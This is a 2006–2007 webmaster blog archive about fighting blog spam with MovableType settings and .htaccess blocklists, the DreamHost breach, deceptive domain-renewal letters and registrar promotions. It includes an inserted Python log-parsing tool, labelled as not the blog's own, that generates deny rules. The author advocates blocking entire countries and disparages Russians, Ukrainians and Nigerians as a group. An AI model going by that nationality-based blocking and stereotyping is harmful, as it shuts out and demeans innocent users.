If you run a MovableType blog and don't care to allow comments or trackbacks, yet you are seeing numerous attempts to spam your blog (in the list of junk comments and trackbacks), you can do what I did and disable them altogether, then delete or rename the files used to post them. To disable them in MovableType, log into your MT installation, click the left-sidebar item "Settings", then click the "New Entry Defaults" tab, then under "Default settings for new entries" uncheck both "Accept Comments" and "Accept Trackbacks," then scroll down to the bottom of the page and click the "Save Changes" button. This will remove the Comments and Trackbacks links under all of your posts. You may still have to manually remove existing comments and trackbacks from old topics, or delete the old topics entirely if they have a lot of useless commenting in them.

Despite the fact that you have disabled accepting comments, the spammers may still try to go straight to your Perl scripts that handle comments and trackbacks, bypassing the choices you made to exclude them. To prevent this you can either remove or rename these two files, which in a standard MT installation live in the MT folder under your CGI directory (typically cgi-bin/MT/):
mt-comments.cgi
mt-tb.cgi

Without those files nobody is going to POST a spam comment to your blog, and you can never accidentally re-enable comments or trackbacks unless you upgrade or replace those files.

As I said in the beginning, these spammers are not reading the results of their attempted trackback messages (success or failure), so they are probably using automated scripts to send them out blindly from a spam list supplied to them by somebody even dumber than they are, without any concern about the success or failure of their efforts. If you run your blog on an Apache-hosted web server and want to deny access to these assholes, read the technical details in my extended comments.



August 3, 2007

Block spammers, scammers and hackers with our .htaccess blocklists

There are millions of websites that host blogs and/or forums and many of them are targeted by scammers, spammers and hackers. Webmasters everywhere are searching for solutions to these problem-causing individuals and scripts. Some of you already know that I can help you block this unwanted traffic from your websites, but a great many more may just be discovering this fact. If your website, or blog, or forum is hosted on an Apache web server, and your hosting allows personal .htaccess overrides, read on.

For those who don't know what .htaccess is: it is an access control file used on Apache servers, on a per-website (or per-directory) basis, to define who may or may not access all or parts of a website, and to rewrite requests for certain files, folders or URLs to other files, folders or URLs. You will notice that the file name has no prefix; just a period followed by htaccess. On a Unix-like server a leading period marks a file as hidden, so a normal directory listing will not show it. Hidden files can be revealed by passing the -al option to the FTP LIST command (the same flags as "ls -al"; many FTP clients expose this as a "remote file mask" of -al or -AL), or with a "show hidden files" option on your control panel's file manager. Your website may or may not already have a .htaccess file. If you upload with an FTP tool, set the remote file mask to -al and refresh the remote view to see whether .htaccess exists in your home, public_html or / directory (more info in the extended comments). Otherwise, look at your website's file manager, or the FTP tools in cPanel or whatever control panel your host provides. There should be some option to reveal hidden files beginning with a period.

If you do not use an FTP Client to upload files, but are using a web-based control panel, it is entirely up to your web host as to whether or not you can view, alter, or upload .htaccess files.

Important Notice! Be careful when creating, editing, or pasting code into a .htaccess file, because if you type an invalid term, directive, or character, or add an unescaped space in a regular expression, you may cause a Server 500 error to occur, locking everybody out of the website, except via FTP access (with login credentials). The server's error log (which cPanel exposes) names the directive Apache choked on; fix it, or rename the file via FTP to get the site back while you do.

The blocklists that I am about to tell you about use the Apache module mod_access (renamed mod_authz_host from Apache 2.2 on), which is almost always available in Linux-based shared, VPS, semi-dedicated, or dedicated hosting. Unfortunately, if your website is hosted on a Windows server you are out of luck, unless your host has installed, or is willing to install, the ISAPI_Rewrite module for you.

Assuming that your website is hosted on a Linux box running an Apache web server, and you are allowed to use a personal .htaccess file with mod_access IP "deny from" directives, the following web pages may be of great help to you in blocking access from unwanted countries, ISPs or hostile servers that are trying to spam or exploit your server (or website).

First on the list is my first work in the field of blocking scammers from forums and auction sites: my Nigerian Blocklist. I have been and still am compiling this list of IP addresses assigned to Nigeria and most of its neighboring countries in Africa, from which Nigerian scammers and other African fraudsters have operated against forums and auction sites around the (non-African) world. It is extremely effective at denying access to anybody trying to reach your website from within Nigeria or other African countries, including via satellite Internet services. If you have a blog, auction site, or forum that is plagued by Nigerian scammers, try embedding my .htaccess directives into your .htaccess file, or create one by copying and pasting the contents of the one on my Nigerian Blocklist web page into a new plain text file (Notepad) and saving it as .htaccess. If your computer's operating system won't allow you to save it without a file prefix, choose htaccess.txt, then upload it to your server and rename it there to .htaccess. You will see an instant drop in the number of Nigerian scammers on your website.

The second blocklist deals with unwanted traffic coming from ISPs and servers within China, Korea and surrounding countries. This is my Chinese Blocklist. All of the same methods listed above apply to this mod_access "deny from" list. It can be copied and pasted into your .htaccess file just as the Nigerian list details show, or it can be added to that list by merging the two groups inside just one set of <Files *> directives. Note that if you do business with anybody in China, Korea or neighboring countries, they will not be able to access your website unless you "poke a hole" in the list to allow their IP address(es) in.

Lastly, I present for your viewing pleasure the Russia and Exploited Servers Blocklist. This list is growing faster than the other two because I am getting hit constantly by so many Russian-based blog and log spammers and server exploit attempts, from both shared and dedicated servers around the world. This blocklist contains a large number of IP addresses and CIDRs (basically, IP ranges) from Russia, the Ukraine and other former Soviet Bloc countries, Turkey, Algeria, and from a huge number of exploited web servers, co-location server farms, and hosting companies around the world. Servers should not be trying to contact other servers unless they have a relationship with each other. These servers want to hack or spam your server or websites and should be blocked.

All of these blocklists are still being added to or modified as new information is discovered about the sources of scams, spamming or hacking attempts from exploited servers. Each page has a button (under the bold last-modified date, before the directives) for you to use to sign up for alerts from the ChangeDetection bot, which will email a notice to you once a day, only on days that I have modified the blocklist you are monitoring. This is a free service that I use myself. Next to that button you will see a PayPal Donate button that I have placed there, where people who benefit from my voluntary work can show some financial appreciation. Any amount will be gladly accepted, with a $10 minimum please.

There are links to contact me for assistance or to provide input, on all of the blocklists, in the footer area.


Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

June 20, 2007

Steel Guitar Forum Server Offline Due To Cut T1 Cable

I am a member of and Moderator of the computers section of the Steel Guitar Forum, which has been offline since the morning of June 19 (2007). In an email exchange with the owner - b0b Lee - it was revealed that workers on the street outside of the server's location have accidentally cut his T1 line. AT&T will be repairing the line as soon as possible. SGF members may wish to use this time to practice their steel guitars, until the forum is back online.

The Steel Guitar Forum is a multi-section discussion forum for members only, most of whom are either amateur or professional pedal steel guitarists. I have been a member for a number of years, since I am also a professional pedal steel player. My section is the computers forum, of which I am the moderator and a strong contributor.

Anybody who plays any type of steel guitar (pedal, non-pedal, or lap steel), or a resophonic guitar is welcome to apply for membership at the SGF.

UPDATE: The SGF is now back online.


June 8, 2007

3500 FTP account passwords stolen from DreamHost database

Reference: DreamHost Status blog, "Security Breach"

It seems that somebody has managed to hack into the customer database of FTP login passwords at the DreamHost website hosting company. According to an email sent out to the affected DreamHost customers, 3500 accounts seem to have been breached by a hacker, or hackers, using as yet unknown attack vectors.

According to the update posted by DreamHost on June 7, this may be a combination of security breaches, including keyloggers that may have been installed onto the affected users' computers. That means that the same thing could affect users of other web hosting companies. So far the hack appears to be the addition of various iframe codes or links to porn sites to all files containing the word "index" in the compromised accounts. The file extension does not matter; if you have a file containing the word "index" it will be a target of this hacker. This includes index files in sub-directories, or add-on domains hosted under the same master account. Therefore, all website owners are urged to download their index files and inspect them for unauthorized modifications. If you find any, remove them and notify your hosting provider, and scan your own computers for spyware, keyloggers, or backdoor trojans.

In one blog post about this I read that at least one DreamHost customer had all of his "index" files overwritten completely with a page containing an iframe exploit, leading to a website that installs a Trojan Horse program.

There is a statement about this incident, from the DreamHost blog, in my extended comments...

If you are a DreamHost customer, and you have scanned your computer for security breaches and found none, and you were notified that your account was among those compromised, and you are looking for another web host, I use and recommend BlueHost Web Hosting. They offer huge amounts of disk space and data transfer, plus unlimited add-on domains, for those who need to host multiple domains at a low monthly rate. I have all of the details on my BlueHost page. I have been with them for over 6 months and have had very little downtime, much less than I used to experience with my previous web host. My server has not been hacked, although I see people trying to do so every day or two (by reading my raw access and error logs).

I am available to assist people whose websites and/or computers have been compromised by hackers, spyware, keyloggers, or other security threats. Please visit my home page for more information and links to my webmaster services and contact pages.



May 25, 2007

Dotster New Domain Registrations at Half Price, May 26 - 28, 2007

Attention website owners!

If you have been thinking about registering a few new domain names, but were waiting until the price was "right," your moment has just arrived! Dotster Domain Registrars just announced a half price sale on new domain registrations, this coming Memorial Day Weekend, from May 26, through 28, 2007. Domains regularly priced at $14.95 will only cost you $7.48 per year, using my coupon code below.

Note that this only applies to brand new domain names, not renewals or transfers.

Particulars

Dates - May 26th, 27th, 28th

Discounted Extensions - .com, .net, .org, .biz, .us

Coupon Code: MDAY50

Bonus coupon code offer

Dotster also provides all manner of web hosting packages, from low cost shared hosting to VPS semi-dedicated, at very reasonable prices.

5 Free Domains with Any Dotster Web Hosting Package! Enter Coupon Code "5FORFREE"


March 20, 2007

March Madness Sale on Domains at Dotster


Yee Haw! Domain Registrar Dotster, Inc. has just announced a March Madness sale on new and transferred Domain registrations, from now until April 1, 2007. Dotster is allowing unlimited numbers of registrations and transfers at the low, low rate of only $7.00 each, when you use coupon code MADNESS during checkout. The regular price for new domain registrations at Dotster is $14.95 per year, so you will save a whopping 53% off new registrations. Domain transfers are regularly $8.95, so you will save 22%, plus gain one extra year on the expiration date, per domain transferred.

If you want to have a web presence you will need to have a domain registered with a recognized Registrar. Dotster is a leading ICANN-accredited registrar capable of registering your .com, .net, .org, .cc, .tv, .ws, .info, and .biz top level domain (TLD) names.

If you would like to learn more about Dotster's services, read my Dotster information page. I have been a happy Dotster customer for 7 years and won't even consider another registrar. Most of my Webmaster clients are also registered at Dotster. Dotster also offers fast and affordable custom web design.


March 7, 2007

Russian and Ukrainian Blog Spammers are STUPID!

< Begin Rant >
If you publish a blog (Weblog) using MovableType, I'm certain that you have learned that if you accept comments, or trackbacks, you are going to attract blog spam (splog). I used to allow comments and trackbacks on my blog until I found that all of the comments and trackbacks were 100% spam, with links to sleazy websites. Being the curious, suspicious spam/scam hunter type of person that I am, I began studying my raw access logs to see where this crap was coming from. I wasn't surprised when I discovered that most of the blog spam aimed at my blog was coming from a few IP addresses in the Ukraine and Russia. Normally I would consider Russians and Ukrainians to be educated, intelligent folks, but now I have to wonder if I was mistaken in that line of thought.

The reason I make such a harsh statement is because I have not allowed comments or trackbacks to be posted for a long time now (Turn Off Comments and Trackbacks), and when I did allow them I always moderated them and deleted spam comments; they were never posted. In an effort to curtail the continuing attempts to post spam to my blog I have even removed the files used to post comments and trackbacks to my MovableType blog. Still, every day, for hours at a time, idiots in Russia and the Ukraine keep trying to spam my blog, despite the fact that I clearly state that no comments or trackbacks are accepted, and the files that are required for them are gone. Every time these idiots POST a comment or trackback my server gives them a 403 Forbidden response, but they don't seem to care, or notice, or are too uneducated to understand that Access Denied means that their request failed to go through! So, growing tired of even giving them the courtesy of a 403 response, I am now redirecting all of these bullshit attempts to POST comments or trackbacks right back to the sender's own browser or web appliance, to 127.0.0.1. That should result in a Page Cannot Be Displayed or Server Cannot Be Located message on the program the idiots are using to try to spam me.

The blog spammers are even resorting to using hijacked proxies, on computers in other countries, but they all get the same message, since I block all such exploits in my .htaccess file. I wasn't born yesterday. I know how to block IP addresses, proxies and unwanted behavior or exploits on my server. I also know how to track the source to their ISP and report them for spamming.

If you run MovableType blogs on an Apache server, and are interested in seeing my solution to the problem of blocking blog spammers, read my extended comments.
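The approach described in this post, worked into a small tool as an added example (this is not the blog's own code or blocklist): it reads an Apache access log, picks out the POSTs to the MovableType comment and trackback scripts, collapses a spammer rotating through one server farm into a /24 the way the blocklists above do, and renders the <Files *> deny block (with a "poked hole" for a legitimate customer) plus the redirect-to-127.0.0.1 rule. The combined log format, the mt-comments.cgi / mt-tb.cgi paths, the sample addresses (RFC 5737 documentation ranges) and the Apache 2.2 mod_access Order/Deny/Allow syntax are assumptions.

```python
"""Added example (not the blog's own code): mine an Apache access log for blog-spam
POSTs and render .htaccess rules in the style the post describes. Assumptions:
Apache combined log format, MovableType's mt-comments.cgi / mt-tb.cgi as the
targets, and the Apache 2.2 mod_access Order/Deny/Allow syntax. Sample log
lines and addresses are constructed from the RFC 5737 documentation ranges."""
import ipaddress
import re
from collections import Counter, defaultdict

# One combined-format line: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The comment and trackback scripts the spammers POST to (assumed MT paths)
SPAM_TARGETS = re.compile(r'/mt-(comments|tb)\.cgi(/|$)')

# Constructed sample: three hosts in one /24 rotate trackback POSTs, one lone
# comment spammer, and one legitimate visitor who must not end up blocked.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Mar/2007:08:00:01 -0500] "POST /cgi-bin/mt/mt-comments.cgi HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible)"
192.0.2.11 - - [07/Mar/2007:08:00:05 -0500] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible)"
192.0.2.12 - - [07/Mar/2007:08:00:09 -0500] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible)"
198.51.100.7 - - [07/Mar/2007:08:01:00 -0500] "POST /cgi-bin/mt/mt-comments.cgi HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible)"
198.51.100.7 - - [07/Mar/2007:08:01:02 -0500] "POST /cgi-bin/mt/mt-comments.cgi HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible)"
203.0.113.5 - - [07/Mar/2007:08:02:00 -0500] "GET /blogs/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Mar/2007:08:02:03 -0500] "GET /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.1" 403 137 "-" "Mozilla/5.0"
""".splitlines()


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def spam_posters(lines):
    """Count POSTs to the comment/trackback scripts per source address.
    A GET to those scripts is not counted; only the POST is the spam attempt."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and SPAM_TARGETS.search(rec["path"]):
            hits[rec["ip"]] += 1
    return hits


def blocklist(hits, min_hosts_for_cidr=3):
    """Collapse offenders into a /24 when several distinct hosts in that /24 are
    active (a spammer rotating through a server farm); otherwise list the single
    address, to keep collateral damage to innocent hosting customers low."""
    by_net = defaultdict(set)
    for ip in hits:
        addr = ipaddress.ip_address(ip)
        by_net[ipaddress.ip_network(f"{addr}/24", strict=False)].add(addr)
    entries = []
    for net, addrs in by_net.items():
        if len(addrs) >= min_hosts_for_cidr:
            entries.append(str(net))
        else:
            entries.extend(str(a) for a in sorted(addrs))
    return sorted(entries, key=lambda e: ipaddress.ip_network(e, strict=False))


def render_htaccess(entries, allow=()):
    """Render one <Files *> deny block plus the redirect-to-loopback rule.
    With Order Deny,Allow an Allow line pokes a hole through a denied CIDR."""
    out = ["<Files *>", "Order Deny,Allow"]
    out += [f"Deny from {e}" for e in entries]
    out += [f"Allow from {a}" for a in allow]
    out.append("</Files>")
    out += [
        "",
        "# Send POSTs to the comment/trackback scripts back to the sender's loopback",
        "RewriteEngine On",
        "RewriteCond %{REQUEST_METHOD} ^POST$",
        "RewriteRule (^|/)mt-(comments|tb)\\.cgi http://127.0.0.1/ [R=302,L]",
    ]
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    offenders = blocklist(spam_posters(SAMPLE_LOG))
    # 192.0.2.99 stands in for a legitimate customer inside a denied range
    print(render_htaccess(offenders, allow=["192.0.2.99"]))
```

The ordering matters for the hole: under Order Deny,Allow a matching Allow overrides a matching Deny, whereas under Order Allow,Deny the Deny would win and the customer would stay locked out.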



February 27, 2007

Dotster $7 Domain Registrations - One Day Only - Feb 28, 2007

If you are a website owner, and are thinking about adding another domain name, Dotster.com is having a one day sale on all new domain registrations of the TLDs: .com, .net, .org, .biz and .us. For the 24 hour period beginning tomorrow, February 28, at 12:01 AM, through 11:59 PM, PST, all new Registrations are only $7.00 for one year! The regular price for these TLD registrations is $14.95/yr. That represents a savings of $7.95 bubba, and that ain't hay! Heck, at that price I'll grab a couple of new domain names and park them on my home page, or add them on to my BlueHost account, since they allow up to 5 additional domains to be hosted under one account, for free.

To grab your $7.00 domain go to Dotster.com on Feb 28 and use the coupon code 7domain when you place the order.

I have more information about Dotster Domain Registrar on my website. I also have a complete webpage about BlueHost, here.

Dotster is also offering coupon code discounts on a second year of web hosting (7hosting), and on their in-house website design services. Visit Dotster.com before March 1, 2007, for the details.


January 20, 2007

Domain Registrar - Liberty Names - Sends Misleading "Domain Name Expiration Notice"

If you own any Internet Domains you already know that they require a valid Domain Registrar to hold your registration information before they can go live on a web host or server. I have had website domains since around the year 2000, and they have all been registered through the same Registrar: Dotster.

Today I received a deceptive letter in the mail from Liberty Names of America, apparently a Domain Registrar. At the top right, in large bold type it said: Domain Name Expiration Notice. After that, in small print, it stated: "As a courtesy, we would like to remind you that it's time to renew your domain name, which is expiring on April 27, 2007." Below that it listed one of my various domain names and a reply by date of March 14, 2007. The rest of the details in the letter are in small type, except for the parts where it outlines the renewal rates for 1, 2 and 5 years, and the place where the gullible would fill in their credit card details to "renew" their domain with these pirates.

As I stated in the first paragraph, Dotster, Inc. is and always has been my domain Registrar. Liberty Names Of America is harvesting the Whois records for as many domains as they can look up, then sending out phony renewal notices to capture business away from the existing Registrars, by deceiving gullible recipients of these letters. To be fair, the letter does state, in small print, that they are not your current Registrar, and that they want you to transfer to them. The back side of the letter contains almost 7" of type that is so tiny that it requires a magnifying glass to read it. In that tiny type are the legal details and disclaimers for their transferring of your service.

As a reference to you all, I currently pay $14.95 per year (1 yr renewals) to maintain my domains at Dotster. Liberty Names is offering me the fabulous opportunity to transfer my domain away from $14.95 a year with Dotster to them, for the low rate of only $25.00! Hmmm. Simple math tells me that they are charging almost twice what Dotster charges for common TLD domain name registration. PIRATES! Take me off your mailing list, Liberty Names of America. You are slimeballs, just like DROA, who sends out similar Expiration Notices to domain owners. Are you the same slimeball company under a different name? Go F yourself!

Now that my tirade is over, if you really do need a decent domain registrar, one that won't dick you around, I recommend Dotster. For $14.95 you can register your domains, not the $25, or $35, or $40 per year that the ripoff registrars charge. They do have sliding reduced rates for 5 or 10 year renewals and charge only $8.95 to transfer your existing domain, plus they add one year to its expiration date.

Nuff said.


August 31, 2006

My Website Hosting Page Has Been Totally Revamped

I finally put the finishing touches on my revamped website hosting page, found at www.wizcrafts.net/hosting.html, on August 30, 2006. This is the first major overhaul of that page in many months.

The old page made a very brief mention of what hosting is and only scraped at the surface of the concept of different types of hosting accounts. It then went on to list the detailed features of a few select web hosting companies, with no mention of alternatives. To say the least, it was lacking in breadth of coverage.

The new hosting page is totally the opposite in how it presents information. The first half of the page contains reasonably detailed explanations about what website hosting is, what web servers are, and details the differences between dedicated, semi-dedicated, VPS and shared web hosting.

The next section explains domain name registration and registrars.

Following that I have embedded a comparison of over 20 shared-hosting companies, outlining their allowed disk space, bandwidth (data transfer), email or FTP accounts, add-on domains policies and pricing (monthly and annual). I have also created separate pages detailing the features of the various hosting plans, showing as many features as the company publishes online. Those pages contain links to the companies and to alternate services like VPS servers. I have not finished the features pages for all of the listed web hosts, but am in the process of creating new ones every day or two. I am also trying to keep the disk space/bandwidth/pricing up to date, as several companies are frequently changing their plans to respond to their competitors.

I also plan to include a voting script on each features page, in the immediate future. I look forward to your input to help rate the various hosts according to your own experiences with them (not hearsay).

The final section of the new hosting page deals with website promotion tools and has several very useful links to help you get listed or improve your online business prospects.

Please avail yourselves of this information, found at www.wizcrafts.net/hosting.html



May 19, 2006

Beware of DROA Domain Name Expiration Notice Postal Mailings

This is a heads-up warning to my fellow Domain owners to watch out if you get a letter in the mail from Domain Registry Of America, or some other Domain Registrar with whom you are not already affiliated as a customer.

Today I got a letter from Domain Registry Of America, addressed to my master account name used in the Whois Directory. The letter proclaims in large bold text:
Domain Name Expiration Notice
It then displays one of my Domain names that is due for renewal in 6 months and "As a courtesy to Domain name holders, we are sending you this notification ....."

Upon carefully reading the details they do make it clear that they are not your current Registrar, and want you to switch from your Registrar to DROA. They brag about only charging $30 for a one year renewal fee, and a bargain rate of only $50 for two years. There are checkboxes to place your order and a place to input your credit card numbers, which you would then mail in. There is a huge amount of information and disclaimers on the back of the letter in such a small font that I had to get a magnifying glass to read it. I wouldn't transfer to these people if they were the last Registrar on earth.

If I was paying $35.00 a year for a Domain that would sound like a bargain, but I am a Dotster customer (see below), and only pay $14.95 per year for TLD Domains (or less if there is a special deal or Happy Hour Sale). If I was fooled into transferring to those people it would double the cost of renewing my Domains. Luckily I wasn't born yesterday.

Many Domains are owned by companies that have different people who know different details about the business, but not everything. These people are probably hoping that this letter will end up at Accounts Payable, where the secretary will call somebody to ask if they have a Domain that might need to be renewed, to which that person may say "I think so." Accounts Payable will pay the invoice by credit card and the company will have its Domain name transferred away from its current chosen Registrar by trickery, probably at increased expense.

I have seen other letters from other Registrars that never mentioned that they are not my current Registrar, asking for x amount of dollars to renew my expiring Domains. This is pure fraud, trying to get me to pay an invoice to a company with whom I have absolutely no relationship. If you do make the mistake of transferring your Domain to such a company you will probably never be able to get them to let you change back. Once a company like that gets your Domain name they make it almost impossible to transfer away from them. Legitimate Registrars have a simple method of locking and unlocking Domain transfers, with no fees (see below about Dotster).

As a Domain owner, make it your business to know with whom your Domains are registered and what the renewal dates are for each Domain. Most Registrars with whom you are a customer will attempt to contact you by email first, to let you know 60 days in advance of a renewal date. Always check carefully when you receive a Domain renewal notice to be sure it is from the Registrar who holds that Domain for you.

My Recommended Registrar:

If you are paying more than $14.95 a year for your Domains, take my recommendation and check out Dotster.com. Dotster is an ICANN Accredited Registrar and is above board all the way. They will not try to scam or trick you into unwittingly transferring a Domain to them. In fact, if you do transfer an existing Domain to Dotster they only charge $8.95 for the transfer and first year Registration, plus they extend your expiration date by an additional year. I have a lot more info about this on my Dotster web page. I have been a Dotster customer since the year 2000 and have never had a complaint about their services or methods of communication.



April 24, 2006

Register New Domains At Dotster.com

The Happy Hour $2.00 Domain name sale has expired, at Dotster.com. I'll let you know when the next one is announced.

If you need to register a new or additional Domain name, I recommend Dotster, which is my Registrar. TLDs go for $14.95 /yr, and transfers are $8.95 with one additional year added to your expiration date, and they have a limited time sale on .info Domains, for only $2.99 for one year.

Use this link to go to the Dotster home page and search for your desired Domain name(s).

Dotster is my registrar for all of my Domains, and most of my Webmaster Services customers use them as well. Dotster is an ICANN Accredited Registrar and has been around for quite a while now. I first learned about them from Leo LaPorte, on Tech TV. I have more details about their services on my Dotster web page, and on my web hosting page. Dotster accepts Domain registrations from people around the World.

I was there on the 26th and bought a new Domain name, www.computer-consulting-services.com and got a free .info with the same prefix. I'll be putting content on it over the next few weeks, but right now it is parked, waiting for my brain cells to wake up again. Watch my blog for details about this new Domain.


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.



This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
